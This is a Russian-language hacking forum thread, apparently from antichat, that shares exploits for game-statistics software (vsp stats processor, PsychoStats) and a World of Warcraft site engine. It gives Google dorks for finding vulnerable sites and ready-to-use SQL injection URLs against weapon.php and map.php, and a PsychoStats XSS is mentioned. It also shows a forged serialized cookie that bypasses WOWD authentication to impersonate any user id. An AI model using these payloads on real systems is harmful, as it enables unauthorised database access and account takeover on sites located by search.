![]() |
[ Уязвимости статистики для онлайн игр ]
название: vsp stats processor
версия: 0.45 /*старше не встречал*/ dork: "powered by vsp stats processor" тип уязвимости: SQL-injection пути могут вариироватся Цитата:
Цитата:
Цитата:
Цитата:
поля и таблицы системы Цитата:
p.s. админки тут как таковой нет.. поэтому использовать можно для вывода других таблиц или если есть права на заливку/чтение файлов p.p.s. используется на серверах провайдеров /*локалки и тд*/ |
PsychoStats
PsychoStats
Google d0rk: "Powered by PsychoStats" [Full-disclosure] PsychoStats 3.0.6b and prior Цитата:
Цитата:
[SQL-injection] Удалённый пользоваель может выполнить произвольный SQL-запрос. Уязвимости существуют из-за: отсутствия проверки параметра id в скрипте map.php отсутствия проверки параметра id в скрипте weapon.php Пример использования: Цитата:
p.s. ранее выкладывалось на ачате по кмс https://forum.antichat.ru/showpost.php?p=464066&postcount=3159 http://video.antichat.ru/file250.html з.з.ы. более ранние версии не рассматривались Цитата:
|
PsychoStats Google d0rk: "Powered by PsychoStats" Multiple Remote SQL Injection Vulnerabilities PsychoStats v2.3 SQL Код:
www.site.com/weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--SQL Код:
www.site.com/map.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15,16,17--SQL Код:
www.site.com/weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* |
PsychoStats v3.1
XSS in PsychoStats v3.1
PHP код:
|
WOWD Движок сайта WoW
PHP код:
|
Цитата:
|
вся фишка в @unserialize и
PHP код:
когда зарегаешся на двишке получиш подобные плюшки Код:
wowduser=a%3A2%3A%7Bi%3A0%3Bs%3A4%3A%226106%22%3Bi%3A1%3Bs%3A40%3A%2258c3f53a0b2e80dd3c2990a8d3c691a16c78b9dd%22%3B%7DКод:
wowduser=a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22[тут id пользователя без квадратных скобок]%22%3Bi%3A1%3Bb%3A1%3B%7D |
Спс за ответ. Можеш еще подсказать в каком файле эти строчки? Просто скачал движок, пока не нашел) Взарание спс)
|
вроде function.php , точно не помню, а ты откуда скачал версия может быть другой
|
chekist, качал вроде с _http://mangos.ru/forum точнее не скажу, уже не помню. Покавыпялся в нем на сайтах, походу версий его немерено и мало кто использует встроеную в него панель управления аккаунтом, а жаль =(
|
| Время: 22:40 |